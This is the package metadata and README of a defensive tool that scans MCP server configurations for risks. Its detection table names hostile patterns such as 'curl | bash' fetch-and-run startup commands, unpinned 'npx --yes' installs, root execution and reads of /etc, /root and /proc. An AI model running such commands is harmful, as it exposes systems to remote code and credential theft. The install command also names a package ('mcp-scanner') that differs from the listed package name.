Metadata-Version: 2.4
Name: dfx-mcp-scanner
Version: 0.1.0
Summary: Security scanner for MCP (Model Context Protocol) servers — detect malicious tools, data exfiltration, and supply chain risks.
Home-page: https://github.com/dockfixlabs/mcp-scanner
Author: Dockfix Labs
Author-email: Dockfix Labs <security@dockfixlabs.dev>
License: MIT
Keywords: mcp,model-context-protocol,security,scanner,ai-agents,claude,cursor
Classifier: Development Status :: 3 - Alpha
Classifier: License :: OSI Approved :: MIT License
Classifier: Programming Language :: Python :: 3
Classifier: Topic :: Security
Requires-Python: >=3.10
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: click>=8.1
Requires-Dist: rich>=13.0
Requires-Dist: pydantic>=2.0
Requires-Dist: pyyaml>=6.0
Provides-Extra: dev
Requires-Dist: pytest>=7.0; extra == "dev"
Requires-Dist: pytest-cov; extra == "dev"
Requires-Dist: ruff; extra == "dev"
Dynamic: author
Dynamic: home-page
Dynamic: license-file
Dynamic: requires-python

# 🔍 MCP Scanner

> **Security scanner for MCP (Model Context Protocol) servers.** Detect malicious tools, data exfiltration, and supply chain risks before connecting an MCP server to your AI agent.

[![Python 3.10+](https://img.shields.io/badge/Python-3.10+-3776AB?style=flat-square&logo=python&logoColor=white)](https://python.org)
[![License: MIT](https://img.shields.io/badge/License-MIT-green?style=flat-square)](LICENSE)

---

## Why MCP Scanner?

MCP servers give AI agents (Claude Code, Cursor, Copilot) direct access to tools, filesystems, and APIs. **But nobody is checking if those servers are safe.**

MCP Scanner analyzes:
- MCP server config files (Claude Code, Cursor, generic)
- Command-level risks (`npx --yes`, `curl|bash`, `sudo`)
- Secret exposure in environment variables
- Filesystem and network access patterns
- Source code of MCP server implementations (with AgentGuard integration)

## Quick Start

```bash
pip install mcp-scanner

# Scan your Claude Code MCP config
mcp-scanner

# Scan a specific config
mcp-scanner ~/.cursor/mcp.json

# JSON output
mcp-scanner .mcp.json --format json
```

## What It Detects

| Rule | Severity | Description |
|------|----------|-------------|
| Remote code execution | CRITICAL | `curl | bash` patterns in server startup |
| Auto-install packages | HIGH | `npx --yes` without version pinning |
| Privileged execution | CRITICAL | Server running as root/sudo |
| Secret exposure | CRITICAL | Real API keys/tokens in config env vars |
| Host filesystem access | HIGH | Server accessing `/etc`, `/root`, `/proc` |
| External network access | MEDIUM | Server connecting to non-localhost URLs |
| Excessive tool count | LOW | Server registering >20 tools |

## Supported Configs

- Claude Code (`~/.claude/claude_code_config.json`)
- Cursor (`~/.cursor/mcp.json`)
- Project-level (`.mcp.json`)
- Generic MCP server configs

## AgentGuard Integration

When [AgentGuard](https://github.com/dockfixlabs/agentguard) is installed, MCP Scanner performs deep source code analysis on MCP server implementations using all 10 OWASP ASI detection rules.

## License

MIT — see [LICENSE](LICENSE).

---

Built by [Dockfix Labs](https://github.com/dockfixlabs).
